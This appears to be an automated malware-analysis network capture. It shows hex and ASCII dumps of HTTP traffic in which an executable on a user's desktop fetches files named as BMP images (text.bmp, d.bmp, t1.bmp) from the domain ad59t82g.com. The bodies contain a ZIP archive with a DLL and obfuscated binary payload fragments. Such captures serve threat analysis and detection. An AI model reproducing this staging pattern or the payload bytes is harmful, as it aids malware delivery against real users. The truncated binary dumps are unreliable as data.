dc 00 6c 6c 66 89 f8 48 de 00 6c 6c c6 44 48 50 53 88 38 48 3d 66 ab 28 24 3e 09 09 c6 44 48 2c 70 66 ab 28 24 50 20 03 c6 44 48 3e 61 88 28 48 53 66 ab 28 24 54 20 05 c6 44 48 3a 62 88 20 48 57 c6 28 48 58 61 e4 20 24 59 0a ab 44 24 36 15 41 66 ab 28 24 44 3a 05 88 4c 48 2a 66 c7 28 48 47 74 19 aa 44 24 25 0d 88 54 48 26 c6 44 48 27 41 88 38 48 4c 88 38 48 [TRUNCATED] Data Ascii: ll4Ugnlhllhhl>PilmlS9:Wj4je$l_Xj5jn7lZ_fHllfHllXj^Hl4j.$l4df$llX$llH4HllHl$l$llHllfHllfHllfHllfHllfHllfHllDHPS8H=f($>DH,pf($P DH>a(HSf($T DH:b HW(HXa $YD$6Af($D:LH*f(HGtD$%TH&DH'A8HL8HMf($Nf(H\VL$2DH3tu($aT$D$<LHDHotDHtHllFHllHlsh%$l$lHl$lti$lloYHllLHLHLHHlHl$l/ch($l+D$NaDHiv($u?stD
Sep 14, 2024 18:31:06.970828056 CEST	1236	IN	Data Raw: 24 16 01 49 88 30 48 7c 66 ab 28 24 7d 0a 03 66 c7 e8 48 80 00 6c 6c 52 74 e4 f8 24 82 6c 6c 00 c6 e8 48 83 00 6c 6c 41 88 e8 48 84 00 6c 6c 88 84 48 e9 00 00 6c 0a c7 84 48 ea 00 00 6c 2a 75 88 f0 48 88 00 6c 6c c7 84 48 e5 00 00 6c 0f 74 69 03 Data Ascii: $I0H\|f($}fHllRt$llHllAHllHlHl*uHllHlti$l$l8HlHlwll-^kll$lljt$l4HlHlD$p<Hl\$X<UUj3D$(\|HxDHtDHXPU($\|$r<tHDbXf($D$zD$0
Sep 14, 2024 18:31:06.970864058 CEST	1236	IN	Data Raw: d2 d4 93 7f 00 6c 9b f1 81 ab af 9e 26 6c 5f d2 89 d0 48 28 01 6c 6c 6a 05 e1 24 01 8b ab ad e8 10 e1 d0 24 f0 6c 6c 00 25 93 13 00 00 9b 9d 59 03 a9 07 c0 14 06 69 03 c6 29 e7 f0 f3 c9 35 8b f3 e7 94 8b 44 48 7c f3 a5 06 69 8b fb e1 d8 24 f0 6c Data Ascii: l&l_H(llj$$ll%Yi)5DH\|i$llYHDl$$W$llrl$D\$@llgD$T$TmP+`\|H@cll<$lTHp7obt\|$\yec9<jZn_$lTmt,-9lHllUf($
Sep 14, 2024 18:31:06.970899105 CEST	672	IN	Data Raw: 43 57 30 24 10 1e a0 8b 57 74 e9 d2 0f e9 3c ff ff 93 5f c0 5f 32 31 5b 83 a8 78 c3 8b 18 48 18 8b 28 7a 24 8d 68 34 0f b7 60 7c 8b 44 7a 70 8d 04 e4 e7 04 10 6f ae eb db 21 36 90 00 6f 6c 00 00 68 6c 00 00 93 93 00 00 d4 6c 00 00 6c 6c 00 00 2c Data Ascii: CW0$Wt<__21[xH(z$h4`\|Dzpo!6olhllll,llllllllllllllllllbslMLMTh pgr cnoLbeLunLn (#S deBaHlll:~V~V~VeVfVQVV`hV\|VPVPVwxVzVw
Sep 14, 2024 18:31:06.970933914 CEST	1236	IN	Data Raw: c0 42 1e 65 6c 03 0f 00 00 c8 73 00 00 6c 5c 02 00 6c 4c 00 00 6c 82 01 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 2c 6c 00 42 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c Data Ascii: Belsl\lLlllllll,lBllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
Sep 14, 2024 18:31:06.970968962 CEST	1236	IN	Data Raw: fa 93 93 4f 8a 2b 6d 47 3a af 19 f8 be 94 f9 01 10 c9 c9 a5 8d d1 90 fa ff 93 23 8a 47 6d 2b 3a c3 19 94 be 04 fa 6d 10 a5 0a c9 a4 8d d1 90 fa ff 93 23 8a 47 6d 2b 3a c3 19 94 be 0c fa 6d 10 a5 0a c9 a4 8d d1 90 fa ff 93 23 8a 47 6d 2b 3a c3 19 Data Ascii: O+mG:#Gm+:m#Gm+:m#Gm+:m#Gm+:<m\|<<$l9S<S5?Tl)M\/uedtCno\|Se\/ntro\?
Sep 14, 2024 18:31:06.971004963 CEST	1236	IN	Data Raw: 45 90 e7 45 08 3f 3b 33 db 3f 06 02 89 e9 a0 fd ff 93 93 15 50 1c 6d 10 68 40 6e 00 00 e7 94 8d 85 bc 91 ff ff 3f 3c e8 65 c0 6c 00 83 a8 60 8d 85 bc 91 ff ff 3c 3b c7 85 bc 91 ff ff 40 6e 00 00 93 79 40 70 6d 7c eb 25 93 d9 cc fd 93 93 8d 85 98 Data Ascii: EE?;3?Pmh@n?<el`<;@ny@pm\|%<Lm<Wy$p\|u;8!_37cll9pm3E)\|@)3<Pj\|U9R<=EmlEhlypm\|M_uUT\|_)SV;p
Sep 14, 2024 18:31:06.971040010 CEST	1236	IN	Data Raw: 96 6d 7c 53 ff ba e9 c0 74 60 e1 45 f4 3c e7 cf e8 c4 97 ff ff 35 e7 7d cc e1 29 f4 50 04 ac 96 01 7c 3f ff d6 e9 ac 74 0c e1 29 f4 50 e7 a3 e8 89 97 93 ff 59 e7 11 cc 8d 29 98 50 68 b8 fa 01 10 3f 93 d6 85 ac 18 0c 8d 29 98 50 8b a3 84 6a fb 93 Data Ascii: m\|St`E<5})P\|?t)PY)Ph?)PjYE<hmS`E<'5}E<m\|St`E<@5})PH\|?t)PY)Ph,?)PYE<h`mS`E<5}
Sep 14, 2024 18:31:06.971075058 CEST	1236	IN	Data Raw: 01 7c 3f ff d6 e9 ac 74 0c e1 29 f4 50 e7 a3 e8 d5 9a 93 ff 59 e7 11 cc 8d 29 98 50 68 10 fa 01 10 3f 93 d6 85 ac 18 0c 8d 29 98 50 8b a3 84 b6 f6 93 93 59 8b 11 a0 8d 45 98 3c 68 94 fa 6d 10 53 93 ba 85 c0 18 60 8d 45 98 3c 8b cf 84 fb f6 ff 93 Data Ascii: \|?t)PY)Ph?)PYE<hmS`E<5}E<m\|St`E<5})P\|?t)PYY)Ph?)P:YE<hmS`E<w5}E<m\|St`E<5})
Sep 14, 2024 18:31:06.971110106 CEST	1236	IN	Data Raw: 68 92 6c 00 00 e1 e9 bd fe 93 93 53 50 e4 f1 bc fe 93 93 e8 fd f1 6c 00 8b 19 64 8d 85 d0 92 ff ff ef a8 0c 2b aa e6 0e 88 60 5c 46 3a a7 19 f6 33 ac 04 fc 01 6c 6c 66 89 e9 d0 fc ff 93 e1 85 be 90 93 ff 53 3c 84 ca 9d 6c 6c 68 ff 6c 6c 00 8d e9 Data Ascii: hlSPld+`\F:3llfS<llhll<<ll5<PEkl;d3\|=P>@M_hm)WiEw (Een)d )Uqf)ta1f<
Sep 14, 2024 18:31:06.971144915 CEST	1236	IN	Data Raw: ff d9 8c e7 ff 93 84 f7 84 6c 6c 59 e9 04 93 ff ff 55 21 0c 7c 55 e7 85 f0 8b 93 ff 8b f9 bc e7 ff 93 e5 02 3b 29 60 74 26 93 d9 e0 e7 93 93 e8 ce e8 6c 00 59 3b 93 d6 ff d9 80 e7 ff 93 93 d6 ff d9 88 e7 ff 93 93 d6 8a af 85 a3 fe 93 93 53 51 06 Data Ascii: llYU!\|U;)`t&lY;SQhSQlyp\|?=<@8m9xlm\|3))dS3?hlljh?jM`l,Pyp\|
Sep 14, 2024 18:31:06.971268892 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 16:31:06 GMT Content-Type: image/x-ms-bmp Content-Length: 137736 Connection: keep-alive Last-Modified: Sun, 08 Sep 2024 05:18:56 GMT ETag: "66dd33c0-21a08" Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uU5KXi7tm1OMVhoxUPflhaB3n1P%2BGcFWwq4ZkdEFttPbLRRdRH4iS9oTeVmnWKchUeDgz0kzV7G%2FvmprZIrjCFTA%2BDrbfdYZo%2BTEMhjh1ZMTd0HrQ8E7CIZpwI5nLPs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c31c3f1a93241e9-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 84 6c 00 00 6c 34 55 89 89 e5 c2 05 93 67 00 00 ed ae ff 19 6e 6c 68 05 6c 6c 00 68 68 6c 00 00 3e 04 c0 1b c4 99 50 e8 69 6c 00 00 ef a8 14 c9 af ed ec 14 6d 6c 00 53 39 3a 57 6a 07 34 6a 65 0a e5 84 24 a0 6c 00 00 5f 81 58 6a 1e 35 6a 6e 37 06 6c 5a 06 5f 66 89 e8 48 ce 00 6c 6c 66 89 e8 48 d4 00 6c 6c 58 6a 5e 0a 89 84 48 b4 00 00 6c 34 6a 2e 0a e5 84 24 b6 6c 00 00 34 06 64 66 e5 e8 24 dc 6c 6c 00 58 e5 c0 24 b0 6c 6c 00 89 00 48 34 89 c0 48 b8 00 6c 6c 89 ac 48 a8 00 00 6c e5 ac 24 d8 6c 00 00 e5 c0 24 ac 6c 6c 00 89 c0 48 e0 00 6c 6c 66 89 e0 48 cc 00 6c 6c 66 89 f0 48 ce 00 6c 6c 66 89 f8 48 d2 00 6c 6c 66 89 e8 48 da 00 6c 6c 66 89 f8 48 dc 00 6c 6c 66 89 f8 48 de 00 6c 6c c6 44 48 50 53 88 38 48 3d 66 ab 28 24 3e 09 09 c6 44 48 2c 70 66 ab 28 24 50 20 03 c6 44 48 3e 61 88 28 48 53 66 ab 28 24 54 20 05 c6 44 48 3a 62 88 20 48 57 c6 28 48 58 61 e4 20 24 59 0a ab 44 24 36 15 41 66 ab 28 24 44 3a 05 88 4c 48 2a 66 c7 28 48 47 74 19 aa 44 24 25 0d 88 54 48 26 c6 44 48 27 41 88 38 48 4c 88 38 48 [TRUNCATED] Data Ascii: ll4Ugnlhllhhl>PilmlS9:Wj4je$l_Xj5jn7lZ_fHllfHllXj^Hl4j.$l4df$llX$llH4HllHl$l$llHllfHllfHllfHllfHllfHllfHllDHPS8H=f($>DH,pf($P DH>a(HSf($T DH:b HW(HXa $YD$6Af($D:LH*f(HGtD$%TH&DH'A8HL8HMf($Nf(H\VL$2DH3tu($aT$D$<LHDHotDHtHllFHllHlsh%$l$lHl$lti$lloYHllLHLHLHHlHl$l/ch($l+D$NaDHiv($u?stD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	172.67.203.195	80	7572	C:\Users\user\Desktop\N6xnw0iEGs.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 18:31:07.263653040 CEST	116	OUT	HEAD /1/text.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Sep 14, 2024 18:31:07.884438038 CEST	690	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 16:31:07 GMT Content-Type: image/x-ms-bmp Content-Length: 6443425 Connection: keep-alive Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT ETag: "66b4e505-6251a1" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXt23f8q%2F3W6MbMJqXQpllALIkweO6CON8Xgnw%2B%2Bv18vQyvdDVuaIk51KKzDxynbbLHBmkZV35tCDq3dxYcq8xO%2FdC26Bu7BS1m1%2FghR6EV%2Br8uPYU5%2F0u32LyvePJk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c31c3f8e8f043d7-EWR alt-svc: h3=":443"; ma=86400
Sep 14, 2024 18:31:07.887370110 CEST	115	OUT	GET /1/text.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Sep 14, 2024 18:31:08.030612946 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 16:31:07 GMT Content-Type: image/x-ms-bmp Content-Length: 6443425 Connection: keep-alive Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT ETag: "66b4e505-6251a1" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 0 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cE0CrtBjdkE7Lx1GVUwOsKz4LZG5svqBTJQ9CUSZ3tE1n8BLAW%2F9UIYH14YNCLQkmPr7dU2MX9xNOibSKDgWkdriiD3Zhlj61JkreOyxtP4sNZFCQ2EUwMLCSK83jEg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c31c3fa9aab43d7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 50 4b 03 04 14 00 00 00 00 00 52 09 02 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 f1 31 ac 66 f1 31 ac 66 f1 31 ac 66 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 6a c1 ab 66 32 4d 82 66 87 7a eb 30 49 5c 70 71 cf 9f 0b 7f 37 1a ef fe ec 4e 99 14 e9 79 0c eb 41 b9 e8 f1 0c 4c 80 3a 7f 76 93 46 46 e8 65 7d bc 46 e7 22 b0 cc d0 5f 0c fe e5 9a c6 07 68 49 cf 67 8c de f1 91 0a 4d 5f 96 fa d9 d6 82 da 5d 83 1e 78 91 03 68 d0 5c f3 7f be 92 78 68 7f 9b 82 3d 58 0a 03 a3 ca 52 a9 20 ad ce 0c 1c 17 57 32 4f 23 2d bd 75 0e cf 2d 73 5a f1 a5 25 a2 53 54 c7 df 3d 96 7b f5 d6 b7 e4 a5 b1 33 57 3e 91 c8 b1 9f 68 0b 2f d7 28 a9 80 e2 6e 4c cc 82 c2 26 fe 2b 7e ce 5e 42 59 1b b0 3c 97 03 3a bf 54 e9 ce 6b d0 11 f6 8c a1 96 6a 71 dd 5b a0 e2 f0 6e 1c 54 d9 8d e7 7b 68 d7 cb 0f 8d a0 bc 2f 63 1e dc b5 69 41 6a 0d fd 2b c8 88 9c 7c 92 ea 7c bc 78 5c b1 3a 4c [TRUNCATED] Data Ascii: PKRYtext/UT1f1f1fPK7Xxtext/MSVCP140.dllUTejf2Mfz0I\pq7NyAL:vFFe}F"_hIgM_]xh\xh=XR W2O#-u-sZ%ST={3W>h/(nL&+~^BY<:Tkjq[nT{h/ciAj+\|\|x\:LSC@rMu`%fJK]^;$)(H$W1;c9;fLFh!=\|z<2A <=T(t-jK<z>Uu>a"-,7\Qk'#PG[H;}h}ix!sVN8G&_#]J_g]G,f
Sep 14, 2024 18:31:08.030648947 CEST	224	IN	Data Raw: 52 4a 96 de f4 55 2f 87 04 f5 77 df 64 b2 b2 cf 7f db 8e e0 a3 c6 bc f2 d8 76 d0 2d a3 8a 92 84 92 1d 04 c3 21 d5 41 3d 5c 5c 55 6e db e0 06 fc 85 66 0c f1 90 1a 88 35 63 60 37 93 5b 01 d5 74 bb 3a a9 99 4a 31 1f 93 12 2f 48 56 f1 b2 b3 25 aa cf Data Ascii: RJU/wdv-!A=\\Unf5c`7[t:J1/HV%6IIBej">($\|:Wb.wAxBMX}bpk055^%wC ua}:?u!j[0;!BidiF2T2mg
Sep 14, 2024 18:31:08.030724049 CEST	1236	IN	Data Raw: 43 07 7d d5 52 2e 0e 0d ed 8f 32 d2 4a 1b cd b4 b5 37 d9 4a 24 75 29 d9 ee e6 23 6f 6f e3 44 44 8b ce 07 24 f8 f2 50 1b 4f 54 7a 79 fa 44 c4 46 93 d7 53 35 9d 29 69 02 2a e2 2a 02 89 0c a6 b9 41 5c 0d 00 1a c1 5d 1f f2 74 a7 f0 ca b9 50 34 00 1b Data Ascii: C}R.2J7J$u)#ooDD$POTzyDFS5)i*A\]tP4R;O_kF@1ja"<VmjeIlO\|sl"JXl8CxqR"eyt`6o8!E#uAS/VhqQ*4JN^;Qv3G7St5
Sep 14, 2024 18:31:08.030808926 CEST	1236	IN	Data Raw: 84 01 d4 00 4d e8 b3 f0 50 21 48 b5 0a 28 c7 46 8b ae d9 07 32 a8 95 ce 7b 4b e8 06 9d 24 07 6a d5 36 41 82 de d6 ce 75 57 6c 73 11 5d ec 81 67 ca 2e 53 f9 60 04 06 9e bf 7f 9d e3 ea b1 c8 ed 58 22 4c c8 0b 47 6c 83 6d 54 53 e2 b6 25 bc d0 18 2b Data Ascii: MP!H(F2{K$j6AuWls]g.S`X"LGlmTS%+5yB#\z3$cWCN0Kw3PmlZbM"o5qW-e $q89lNd]lFh0}Z^CTa2JoCX_M
Sep 14, 2024 18:31:08.030843019 CEST	448	IN	Data Raw: 7c d0 79 f7 c4 a6 e6 0a 67 24 cb 26 85 8b 19 fb f6 27 29 a1 b3 81 56 ce 2a 77 e4 9c c7 bc f0 fc 32 15 9a 63 0f d6 5c a2 59 20 a1 c3 c6 76 dd 2c b9 bd c8 3c a7 ec 3d 0c b4 40 46 db 6e cb 09 a4 da b3 1f 63 d8 37 37 64 19 32 d0 35 24 b1 68 cc 69 ef Data Ascii: \|yg$&')V*w2c\Y v,<=@Fnc77d25$hi%69\|w,1a!qo,0Ek+zNz@.:(c+pf6f@0&"Ky>T0GbRcw-"r#u
Sep 14, 2024 18:31:08.030877113 CEST	1236	IN	Data Raw: 9e 51 25 f6 ae 87 49 72 1d bc 03 43 76 ea 9c a1 2a b8 d8 64 dc e5 a8 e6 8a f3 e3 23 4b 8f e6 5d 51 d5 30 63 b2 54 61 a9 d3 39 ef b0 7c 83 01 e7 98 0d 91 85 43 4e 83 38 3f 41 81 fb cc 16 dd 2e 42 2f b2 69 7b 56 d7 55 6f 1a 79 a6 c1 a9 d9 ac 56 93 Data Ascii: Q%IrCvd#K]Q0cTa9\|CN8?A.B/i{VUoyVreZsFll m2#:brRw'psP2mOYF\|\|\^D5k6F },mkmtu&PADr~@&x<s%A,@
Sep 14, 2024 18:31:08.030910015 CEST	1236	IN	Data Raw: cd fe f3 83 66 3f a6 62 b2 21 35 ef bd 2e b1 29 4f 32 64 ea a6 ae bb 91 22 3e e1 f8 8e cf 15 c6 90 86 4d 0e 04 52 7a c1 20 1b f0 90 d7 cc 44 0f d1 eb f5 ff 3e dc 3f 53 e6 62 68 dd 81 d1 2f 90 46 00 ff 6b 30 a7 e4 95 32 cb bd 1f 8a e5 fe ed 82 53 Data Ascii: f?b!5.)O2d">MRz D>?Sbh/Fk02S&?,){MBQ"z3z)]sPpx_o1N"9DPvt#lmcM]YPNxy'@Alk2$B]!eL}bq0r
Sep 14, 2024 18:31:08.030945063 CEST	448	IN	Data Raw: a0 bb 31 1b b8 8e 31 60 fc b3 2c 59 19 d4 bb 54 c4 8a 6e a1 b7 7f 83 c5 7e 08 ca 23 fb b5 f4 9b 60 da 68 9d 5f fc 0b 85 7e cc 04 51 d9 74 b6 b9 9e c6 e6 c4 8d e3 79 aa d8 ff 17 fe c1 5f 04 f8 26 b6 2e 89 f0 4d 1c 2c cf 85 a8 9b 8b 5b f0 35 1b 3c Data Ascii: 11`,YTn~#`h_~Qty_&.M,[5<K(uOEKoV=c?.&*ln'MYi(/l6}IyL+#fm\(\|}A(`W$v,}Ta<xXk?Nq6S_
Sep 14, 2024 18:31:08.030975103 CEST	892	IN	Data Raw: d4 ab 09 60 40 30 2d f4 97 04 c6 fb 9b 75 2d 6d 07 44 ca d2 e8 cd 17 f6 44 16 d2 ee 44 5b c8 2a 4e 47 48 f6 90 dc cb 89 23 ab 2b 12 dd 8e 4d 11 4d 35 e0 6c da 66 98 92 3e 37 1a 65 06 aa b2 29 fd 8d 37 da e0 69 32 34 81 ec 4f 3f 09 1c 0b 0c 89 b6 Data Ascii: `@0-u-mDDD[*NGH#+MM5lf>7e)7i24O?5fJs>Df<qskouNHP3^_F@$/#9CN.tSFip6('44OY}76x{C4,ba,f60D`SR^Kb
Sep 14, 2024 18:31:08.031007051 CEST	1236	IN	Data Raw: 7f e2 ff 22 54 8e 35 e1 35 0c 97 2a 69 cb 82 a8 a0 a5 9a 29 24 ca 1a 2a 28 e1 cd 30 05 84 69 8e 74 24 49 09 19 b6 46 dc b5 26 2e 87 11 a9 2c 2d 45 f3 78 cc a5 c7 e3 15 8c 48 fa 11 6d 02 f7 3d e5 ca 01 59 72 0a c7 d9 79 ea 51 5e 24 fb fa 1b c1 79 Data Ascii: "T55i)$(0it$IF&.,-ExHm=YryQ^$y62@Ohj6dSk[I3f[M[KjT/c f*(tJ~muisyLvhG03Lw9XmcYOE5M +/+62
Sep 14, 2024 18:31:08.031044006 CEST	1236	IN	Data Raw: e7 83 60 3a 46 94 eb d2 41 b4 e4 ec be 87 58 f8 2f 41 b3 32 2c e0 a2 b5 1f c7 ac 7e 58 66 98 dd 0f 9d 1e ad ca 7c 80 38 2a 62 15 e4 35 50 ea 43 2d f5 6a 21 54 ee 2e 35 e2 4f 0f 06 cf 60 04 af 55 b0 02 97 ce e7 ef 24 2f 5e 4d 68 7c 90 2c e3 ab df Data Ascii: `:FAX/A2,~Xf\|8b5PC-j!T.5O`U$/^Mh\|,s?Bg3Ynf9 B_E`I/hwJPxw\|30I'C?oKhZ71Ac>6u;sow )JCUS!Yi]
Sep 14, 2024 18:31:13.757958889 CEST	113	OUT	HEAD /1/d.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Sep 14, 2024 18:31:14.001019955 CEST	698	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 16:31:13 GMT Content-Type: image/x-ms-bmp Content-Length: 1236598 Connection: keep-alive Last-Modified: Tue, 03 Sep 2024 17:12:42 GMT ETag: "66d7438a-12de76" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p829%2F1DoPNZjLy9M6%2BAgrNGvt2O%2FPiMiWpq9hp33x3WqiVRw%2FtacoPyjvcCHx%2F6mqCn%2BMyVRfCq%2BYVEPcqkqxiHJnqTF2dO0%2FhDFUluYsnwJglKV%2B%2Bdl8DsfOJe%2FqH4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c31c41f4fbb43d7-EWR alt-svc: h3=":443"; ma=86400
Sep 14, 2024 18:31:14.009351015 CEST	112	OUT	GET /1/d.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Sep 14, 2024 18:31:14.138669014 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 16:31:14 GMT Content-Type: image/x-ms-bmp Content-Length: 1236598 Connection: keep-alive Last-Modified: Tue, 03 Sep 2024 17:12:42 GMT ETag: "66d7438a-12de76" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 1 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvZO1dib4nCM9Ynf2RmY8AsJpq46TsnOYyfavyEU7BouohqFFo2xLjPXHL%2FM4PQaGqdJ3cYd%2FZkUpwx%2Bl%2BX4aG6TsCCbeDvNBXMsc2MMZMC5x0TdxhAnogANLgo7%2Fvw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c31c420e91f43d7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 42 4d 76 de 12 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 02 00 00 2c 02 00 00 01 00 20 00 00 00 00 00 40 de 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 52 90 00 64 08 00 00 63 08 00 00 98 f7 00 00 df 08 00 00 67 08 00 00 27 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 97 08 00 00 69 17 ba 0e 67 bc 09 cd 46 b0 01 4c aa 29 54 68 0e 7b 20 70 15 67 67 72 06 65 20 63 06 66 6e 6f 13 28 62 65 47 7a 75 6e 47 61 6e 20 23 47 53 20 0a 67 64 65 49 05 0d 0a 43 08 00 00 67 08 00 00 9a 88 c4 41 de e9 aa 12 de e9 aa 12 de e9 aa 12 b1 9f 34 12 ea e9 aa 12 b1 9f 00 12 46 e9 aa 12 b1 9f 01 12 f1 e9 aa 12 d7 91 29 12 dd e9 aa 12 d7 91 39 12 cf e9 aa 12 de e9 ab 12 04 e9 aa 12 b1 9f 05 12 ff e9 aa 12 b1 9f 31 12 df e9 aa 12 b1 9f 30 12 df e9 aa 12 b1 9f 37 12 df e9 aa 12 35 61 63 68 de e9 aa 12 67 08 00 00 67 08 00 00 37 4d 00 00 2b 09 05 00 ad 48 d7 66 67 08 00 00 67 08 00 00 87 08 02 21 6c 09 0a 00 67 b6 0a 00 67 38 09 00 67 08 00 00 43 55 08 00 [TRUNCATED] Data Ascii: BMv6(,, @*Rdcg'ggggggggigFL)Th{ pggre cfno(beGzunGan #GS gdeICgA4F)91075achgg7M+Hfgg!lgg8gCUgggggbgbgg8gge@gggggwA>g8?gggggHgggggggg? 'gggggggggI
Sep 14, 2024 18:31:16.073506117 CEST	114	OUT	HEAD /1/t1.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Sep 14, 2024 18:31:16.669313908 CEST	676	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 16:31:16 GMT Content-Type: image/x-ms-bmp Content-Length: 2485 Connection: keep-alive Last-Modified: Thu, 12 Sep 2024 11:36:25 GMT ETag: "66e2d239-9b5" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SzH%2Fqa4S%2FVlr7tandhhaDbnkTnWsqZDTAEtjWsNK7e%2F3yqSRw0YaTWXKr4UAfEiK4HxM76qjWv6ASHMiyJ3i8ITdWh8MyzYhfSNYo81VNcxlC9QMAAot6ACVxwJrxU8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c31c42dcd1f43d7-EWR alt-svc: h3=":443"; ma=86400
Sep 14, 2024 18:31:16.670259953 CEST	113	OUT	GET /1/t1.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Sep 14, 2024 18:31:16.774032116 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 16:31:16 GMT Content-Type: image/x-ms-bmp Content-Length: 2485 Connection: keep-alive Last-Modified: Thu, 12 Sep 2024 11:36:25 GMT ETag: "66e2d239-9b5" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 0 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eIWywWQrA6JzaWMCIeqlmcMb7eVxzlk2Pr2d%2Fch8aYd6yaYYOY%2By3hslyldAIOLl%2BNT9I8gwsAjWPtKZKMG2AMNGRu%2FyWx7X3t8BBX82MqEIW3nNBCan46TqwNBqX18%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c31c431792d43d7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 42 4d de b2 08 00 00 00 00 00 36 00 00 00 28 00 00 00 7a 01 00 00 79 01 00 00 01 00 20 00 00 00 00 00 a8 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 83 ec 83 83 f0 81 ec 73 0a 00 00 03 a9 30 00 67 08 53 33 bc 81 5c 24 3b 81 5c 24 17 81 5c 24 13 81 5c 24 1f 83 40 0c ec 48 14 56 30 e3 42 0f d0 40 24 8b 37 20 d1 e9 54 f7 3b cb 19 17 0f b7 55 8b c2 02 e4 f6 61 72 61 89 c6 e0 98 08 00 69 98 29 05 00 67 07 b7 f6 64 f6 49 75 86 89 e7 ff 98 f7 7f 81 98 d8 d1 91 08 07 84 ec 67 08 00 8b 67 33 c3 75 dd 3b f6 53 0f 52 3c 94 24 e0 bf 06 67 08 50 68 11 4f cc 69 ee 4c 24 30 8f b8 06 00 67 f7 74 24 57 81 44 24 5f 60 12 65 f4 4e e8 9e 61 08 00 ff 13 2c 38 89 23 2c 44 68 2e d2 de 2a 8f 84 06 00 67 f7 74 24 27 81 44 24 37 60 0f f5 21 02 e8 7a 61 08 00 89 23 2c 58 83 a3 20 8d 44 43 04 50 c7 23 2c 10 6e 13 6c 6c 66 a0 4c 24 14 0b 08 ff 54 43 20 ff 74 43 28 8b f0 0f 83 2b 8f 6e e0 4b 06 67 08 ff 74 43 20 89 44 43 48 68 e2 36 5e 66 e8 5e 0e 00 00 e4 cc 10 89 23 2c 38 e8 4e 0e 00 00 54 c1 80 3c 66 6b 75 31 [TRUNCATED] Data Ascii: BM6(zy 2s0gS3\$;\$\$\$@HV0B@$7 